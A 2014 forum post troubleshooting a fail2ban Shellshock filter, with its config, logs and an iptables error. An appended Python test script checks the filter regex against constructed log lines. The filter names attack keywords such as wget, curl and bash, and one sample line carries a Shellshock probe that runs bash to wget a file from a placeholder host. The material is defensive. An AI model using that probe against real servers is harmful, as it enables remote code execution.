charly78
10-25-2014 11:31 AM
errors
I dunno, but I seem to be getting some errors.
Here is my most recent info on the fail2ban filter:
# cat /etc/fail2ban/filter.d/shellshock.conf
Code:
[INCLUDES]
# Read common prefixes. If any customizations available -- read them from
# common.local
#before = common.conf
[Definition]
#_daemon = apache2
# Option: failregex
# Notes.: regex to match the failures messages of bash in the logfile. The
# host must be matched by a group named "host". The tag "<HOST>" can
# be used for standard IP/hostname matching and is only an alias for
# (?:::f{4,6}:)?(?P<host>\S+)
# Values: TEXT
#
docroot = /var/www/html
#old original method revised 09/27/14
#shellshock = ping|cgi-bin|bash|wget|curl|cat
#failregex = ^<HOST> .*"(GET|POST) .*\/(?:%(shellshock)s).*?"
failregex = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+
# Option: ignoreregex
# Notes.: regex to ignore. If this regex matches, the line is ignored.
# Values: TEXT
#
ignoreregex =
# cat /etc/fail2ban/jail.local
Code:
[shellshock]
enabled = true
port = http,https
filter = shellshock
action = mail-whois[name=shellshock, dest=shellshock@mydomain.com]
logpath = /var/log/apache*/access.log
maxretry = 1
bantime = 29900
All seems good; it grabs and emails me a whois so I can contact the abuse email address.
Code:
cat /var/log/fail2ban.log
2014-10-19 04:48:03,221 fail2ban.server : INFO Changed logging target to /var/log/fail2ban.log for Fail2ban v0.8.4-SVN
2014-10-19 04:48:03,257 fail2ban.filter : INFO Log rotation detected for /var/log/apache2/error.log
2014-10-19 04:48:03,283 fail2ban.filter : INFO Log rotation detected for /var/log/apache2/access.log
2014-10-19 04:48:03,597 fail2ban.filter : INFO Log rotation detected for /var/log/apache2/error.log
2014-10-19 04:49:44,232 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-19 04:50:01,389 fail2ban.filter : INFO Log rotation detected for /var/log/apache2/access.log
2014-10-19 07:57:12,694 fail2ban.actions: WARNING [shellshock] Ban 5.135.35.32
2014-10-19 10:07:12,730 fail2ban.actions: WARNING [shellshock] Unban 5.135.35.32
2014-10-20 04:49:40,675 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-20 04:49:41,294 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-20 04:49:41,345 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-20 14:16:41,563 fail2ban.actions: WARNING [dovecot-pop3imap] Ban 218.5.76.26
2014-10-20 16:26:42,220 fail2ban.actions: WARNING [dovecot-pop3imap] Unban 218.5.76.26
2014-10-21 03:34:43,863 fail2ban.actions: WARNING [shellshock] Ban 184.106.228.211
2014-10-21 04:49:37,838 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,210 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,400 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,676 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-21 04:49:38,771 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:38,807 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,212 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,401 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,773 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,809 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 04:49:39,840 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-21 05:44:43,883 fail2ban.actions: WARNING [shellshock] Unban 184.106.228.211
2014-10-21 12:19:26,815 fail2ban.actions: WARNING [shellshock] Ban 104.192.0.18
2014-10-21 12:25:46,458 fail2ban.actions: WARNING [shellshock] 104.192.0.18 already banned
2014-10-21 14:29:27,793 fail2ban.actions: WARNING [shellshock] Unban 104.192.0.18
2014-10-22 00:14:30,322 fail2ban.jail : INFO Jail 'dovecot-pop3imap' stopped
2014-10-22 00:14:31,117 fail2ban.jail : INFO Jail 'courierauth' stopped
2014-10-22 00:14:32,093 fail2ban.jail : INFO Jail 'postfix' stopped
2014-10-22 00:14:32,816 fail2ban.jail : INFO Jail 'ssh-ddos' stopped
2014-10-22 00:14:33,161 fail2ban.jail : INFO Jail 'apache-multiport' stopped
2014-10-22 00:14:33,567 fail2ban.jail : INFO Jail 'pureftpd' stopped
2014-10-22 00:14:34,456 fail2ban.jail : INFO Jail 'couriersmtp' stopped
2014-10-22 00:14:35,176 fail2ban.jail : INFO Jail 'ssh' stopped
2014-10-22 00:14:35,718 fail2ban.jail : INFO Jail 'apache' stopped
2014-10-22 00:14:36,170 fail2ban.jail : INFO Jail 'sasl' stopped
2014-10-22 00:14:37,179 fail2ban.jail : INFO Jail 'shellshock' stopped
2014-10-22 00:14:37,417 fail2ban.jail : INFO Jail 'proftpd' stopped
2014-10-22 00:14:37,419 fail2ban.server : INFO Exiting Fail2ban
2014-10-22 00:14:37,694 fail2ban.server : INFO Changed logging target to /var/log/fail2ban.log for Fail2ban v0.8.4-SVN
2014-10-22 00:14:37,695 fail2ban.jail : INFO Creating new jail 'dovecot-pop3imap'
2014-10-22 00:14:37,695 fail2ban.jail : INFO Jail 'dovecot-pop3imap' uses poller
2014-10-22 00:14:37,707 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,707 fail2ban.filter : INFO Set maxRetry = 5
2014-10-22 00:14:37,708 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,708 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,712 fail2ban.jail : INFO Creating new jail 'pam-generic'
2014-10-22 00:14:37,712 fail2ban.jail : INFO Jail 'pam-generic' uses poller
2014-10-22 00:14:37,713 fail2ban.filter : INFO Added logfile = /var/log/auth.log
2014-10-22 00:14:37,713 fail2ban.filter : INFO Set maxRetry = 4
2014-10-22 00:14:37,714 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,714 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,719 fail2ban.jail : INFO Creating new jail 'ssh-ddos'
2014-10-22 00:14:37,719 fail2ban.jail : INFO Jail 'ssh-ddos' uses poller
2014-10-22 00:14:37,719 fail2ban.filter : INFO Added logfile = /var/log/auth.log
2014-10-22 00:14:37,720 fail2ban.filter : INFO Set maxRetry = 4
2014-10-22 00:14:37,720 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,720 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,724 fail2ban.jail : INFO Creating new jail 'apache-multiport'
2014-10-22 00:14:37,724 fail2ban.jail : INFO Jail 'apache-multiport' uses poller
2014-10-22 00:14:37,725 fail2ban.filter : INFO Added logfile = /var/log/apache2/error.log
2014-10-22 00:14:37,725 fail2ban.filter : INFO Set maxRetry = 4
2014-10-22 00:14:37,725 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,726 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,729 fail2ban.jail : INFO Creating new jail 'apache-overflows'
2014-10-22 00:14:37,729 fail2ban.jail : INFO Jail 'apache-overflows' uses poller
2014-10-22 00:14:37,730 fail2ban.filter : INFO Added logfile = /var/log/apache2/error.log
2014-10-22 00:14:37,730 fail2ban.filter : INFO Set maxRetry = 2
2014-10-22 00:14:37,731 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,731 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,735 fail2ban.jail : INFO Creating new jail 'couriersmtp'
2014-10-22 00:14:37,735 fail2ban.jail : INFO Jail 'couriersmtp' uses poller
2014-10-22 00:14:37,735 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,736 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,736 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,737 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,740 fail2ban.jail : INFO Creating new jail 'pureftpd'
2014-10-22 00:14:37,740 fail2ban.jail : INFO Jail 'pureftpd' uses poller
2014-10-22 00:14:37,740 fail2ban.filter : INFO Added logfile = /var/log/syslog
2014-10-22 00:14:37,741 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,741 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,742 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,745 fail2ban.jail : INFO Creating new jail 'ssh'
2014-10-22 00:14:37,745 fail2ban.jail : INFO Jail 'ssh' uses poller
2014-10-22 00:14:37,746 fail2ban.filter : INFO Added logfile = /var/log/auth.log
2014-10-22 00:14:37,746 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,746 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,747 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,816 fail2ban.jail : INFO Creating new jail 'postfix'
2014-10-22 00:14:37,816 fail2ban.jail : INFO Jail 'postfix' uses poller
2014-10-22 00:14:37,816 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,817 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,817 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,818 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,821 fail2ban.jail : INFO Creating new jail 'sasl'
2014-10-22 00:14:37,821 fail2ban.jail : INFO Jail 'sasl' uses poller
2014-10-22 00:14:37,821 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,822 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,822 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,823 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,827 fail2ban.jail : INFO Creating new jail 'apache'
2014-10-22 00:14:37,827 fail2ban.jail : INFO Jail 'apache' uses poller
2014-10-22 00:14:37,827 fail2ban.filter : INFO Added logfile = /var/log/apache2/error.log
2014-10-22 00:14:37,828 fail2ban.filter : INFO Set maxRetry = 4
2014-10-22 00:14:37,828 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,828 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,831 fail2ban.jail : INFO Creating new jail 'courierauth'
2014-10-22 00:14:37,831 fail2ban.jail : INFO Jail 'courierauth' uses poller
2014-10-22 00:14:37,832 fail2ban.filter : INFO Added logfile = /var/log/mail.log
2014-10-22 00:14:37,832 fail2ban.filter : INFO Set maxRetry = 3
2014-10-22 00:14:37,833 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,833 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,836 fail2ban.jail : INFO Creating new jail 'shellshock'
2014-10-22 00:14:37,836 fail2ban.jail : INFO Jail 'shellshock' uses poller
2014-10-22 00:14:37,837 fail2ban.filter : INFO Added logfile = /var/log/apache2/access.log
2014-10-22 00:14:37,837 fail2ban.filter : INFO Set maxRetry = 1
2014-10-22 00:14:37,838 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,839 fail2ban.actions: INFO Set banTime = 20000
2014-10-22 00:14:37,842 fail2ban.jail : INFO Creating new jail 'proftpd'
2014-10-22 00:14:37,842 fail2ban.jail : INFO Jail 'proftpd' uses poller
2014-10-22 00:14:37,843 fail2ban.filter : INFO Set maxRetry = 6
2014-10-22 00:14:37,843 fail2ban.filter : INFO Set findtime = 600
2014-10-22 00:14:37,843 fail2ban.actions: INFO Set banTime = 7800
2014-10-22 00:14:37,852 fail2ban.jail : INFO Jail 'dovecot-pop3imap' started
2014-10-22 00:14:37,854 fail2ban.jail : INFO Jail 'pam-generic' started
2014-10-22 00:14:37,855 fail2ban.jail : INFO Jail 'ssh-ddos' started
2014-10-22 00:14:37,855 fail2ban.jail : INFO Jail 'apache-multiport' started
2014-10-22 00:14:37,856 fail2ban.jail : INFO Jail 'apache-overflows' started
2014-10-22 00:14:37,857 fail2ban.jail : INFO Jail 'couriersmtp' started
2014-10-22 00:14:37,858 fail2ban.jail : INFO Jail 'pureftpd' started
2014-10-22 00:14:37,858 fail2ban.jail : INFO Jail 'ssh' started
2014-10-22 00:14:37,859 fail2ban.jail : INFO Jail 'postfix' started
2014-10-22 00:14:37,860 fail2ban.jail : INFO Jail 'sasl' started
2014-10-22 00:14:37,860 fail2ban.jail : INFO Jail 'apache' started
2014-10-22 00:14:37,862 fail2ban.jail : INFO Jail 'courierauth' started
2014-10-22 00:14:37,863 fail2ban.jail : INFO Jail 'shellshock' started
2014-10-22 00:14:37,863 fail2ban.jail : INFO Jail 'proftpd' started
2014-10-22 04:49:33,038 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-23 04:49:40,900 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-23 21:36:21,767 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 21:36:28,922 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 21:36:36,139 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 21:36:44,704 fail2ban.actions: WARNING [pureftpd] Ban 60.176.110.32
2014-10-23 21:36:45,336 fail2ban.filter : WARNING Unable to find a corresponding IP address for 32.110.176.60.broad.hz.zj.dynamic.163data.com.cn
2014-10-23 23:46:45,404 fail2ban.actions: WARNING [pureftpd] Unban 60.176.110.32
2014-10-24 04:49:40,119 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,409 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,448 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,519 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-24 04:49:40,615 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,627 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-24 04:49:40,656 fail2ban.filter : INFO Log rotation detected for /var/log/auth.log
2014-10-24 04:49:40,766 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,851 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
2014-10-24 04:49:41,121 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,411 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,450 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,617 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,768 fail2ban.filter : INFO Log rotation detected for /var/log/mail.log
2014-10-24 19:02:44,194 fail2ban.actions: WARNING [ssh] Ban 222.186.21.66
2014-10-24 19:02:47,206 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:50,210 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:53,213 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:57,217 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:57,518 fail2ban.actions: WARNING [pam-generic] Ban 222.186.21.66
2014-10-24 21:12:44,794 fail2ban.actions: WARNING [ssh] Unban 222.186.21.66
2014-10-24 21:12:58,261 fail2ban.actions: WARNING [pam-generic] Unban 222.186.21.66
2014-10-25 04:49:39,765 fail2ban.filter : INFO Log rotation detected for /var/log/syslog
I go and install on a newer setup and I get an error:
# cat /var/log/fail2ban.log|tail
Code:
2014-10-25 12:30:37,210 fail2ban.filter : INFO Set findtime = 600
2014-10-25 12:30:37,210 fail2ban.actions: INFO Set banTime = 259200
2014-10-25 12:30:37,275 fail2ban.jail : INFO Jail 'ssh' started
2014-10-25 12:30:37,292 fail2ban.jail : INFO Jail 'ssh-ddos' started
2014-10-25 12:30:37,305 fail2ban.jail : INFO Jail 'apache' started
2014-10-25 12:30:37,345 fail2ban.jail : INFO Jail 'shellshock' started
2014-10-25 12:30:37,371 fail2ban.actions.action: ERROR iptables -N fail2ban-shellshock
iptables -A fail2ban-shellshock -j RETURN
iptables -I INPUT -p http --dport http -j fail2ban-shellshock returned 200
2014-10-25 12:30:37,386 fail2ban.jail : INFO Jail 'asterisk-iptables' started
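A way to check the posted failregex offline, added here as an example and not part of the original post or of fail2ban's own code: the script below expands the `<HOST>` tag the way fail2ban 0.8 does (the expansion quoted in the filter's own comment), runs both the current regex and the commented-out keyword regex from the same filter over constructed Apache access-log lines, and returns the hosts each one would ban. The log lines, the 203.0.113.x / 198.51.100.x addresses and the `matching_hosts` helper are made up for the example.

```python
import re

# failregex exactly as in the post's /etc/fail2ban/filter.d/shellshock.conf
FAILREGEX = r'<HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+'

# The commented-out "old original method" from the same file, with %(shellshock)s expanded
OLD_FAILREGEX = r'^<HOST> .*"(GET|POST) .*\/(?:ping|cgi-bin|bash|wget|curl|cat).*?"'

# fail2ban 0.8 substitutes this named group for the <HOST> tag (quoted in the filter's comment)
HOST_TAG = r'(?:::f{4,6}:)?(?P<host>\S+)'


def compile_failregex(failregex):
    """Turn a fail2ban-style failregex into a Python pattern, as fail2ban does."""
    return re.compile(failregex.replace('<HOST>', HOST_TAG))


def matching_hosts(lines, failregex=FAILREGEX):
    """Return the <host> group of every line the failregex matches, in log order.

    fail2ban 0.8 applies each failregex with search(), so the pattern does not
    need to be anchored at the start of the line.
    """
    pattern = compile_failregex(failregex)
    hosts = []
    for line in lines:
        match = pattern.search(line)
        if match:
            hosts.append(match.group('host'))
    return hosts


# Constructed Apache combined-format lines (hypothetical hosts, not the post's log)
SAMPLE_LOG = [
    # Shellshock probe carried in the User-Agent, hitting a CGI path
    '203.0.113.5 - - [25/Oct/2014:12:00:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 288 '
    '"-" "() { :;}; /bin/bash -c \'wget http://203.0.113.9/x\'"',
    # Same function-definition header carried in the Referer, plain path
    '203.0.113.6 - - [25/Oct/2014:12:00:02 +0000] "GET / HTTP/1.1" 200 612 '
    '"() { :; }; echo vulnerable" "curl/7.30"',
    # Benign request whose path happens to contain /bash and cgi-bin
    '198.51.100.7 - - [25/Oct/2014:12:00:03 +0000] "GET /docs/bash-cgi-bin-howto.html HTTP/1.1" 200 1024 '
    '"-" "Mozilla/5.0"',
    # Benign request with braces and a semicolon but no "() {" header
    '198.51.100.8 - - [25/Oct/2014:12:00:04 +0000] "GET /api?q={x};y HTTP/1.1" 200 10 '
    '"-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    print('current failregex bans:', matching_hosts(SAMPLE_LOG))
    print('old keyword failregex bans:', matching_hosts(SAMPLE_LOG, OLD_FAILREGEX))
```

The function-definition regex catches the `() { :;};` header whether it arrives in the User-Agent or the Referer and leaves the benign `/docs/bash-cgi-bin-howto.html` request alone, while the older keyword regex flags that request because of the `/bash` in its path; `fail2ban-regex /var/log/apache2/access.log /etc/fail2ban/filter.d/shellshock.conf` runs the same check against a real log. Two things to read from the posted logs rather than the filter: the posted jail's only action is `mail-whois`, so each `Ban` line in the first log sent mail and installed no firewall rule; and the command that failed on the new box, `iptables -I INPUT -p http --dport http -j fail2ban-shellshock`, is fail2ban's `iptables` action rendered with `protocol` set to `http`. iptables resolves service names like `http` for `--dport`, but `-p` must name a protocol such as `tcp`, so that jail needs `protocol = tcp` (the `returned 200` is iptables' exit status 2, which fail2ban 0.8 logs as the wait status in hex).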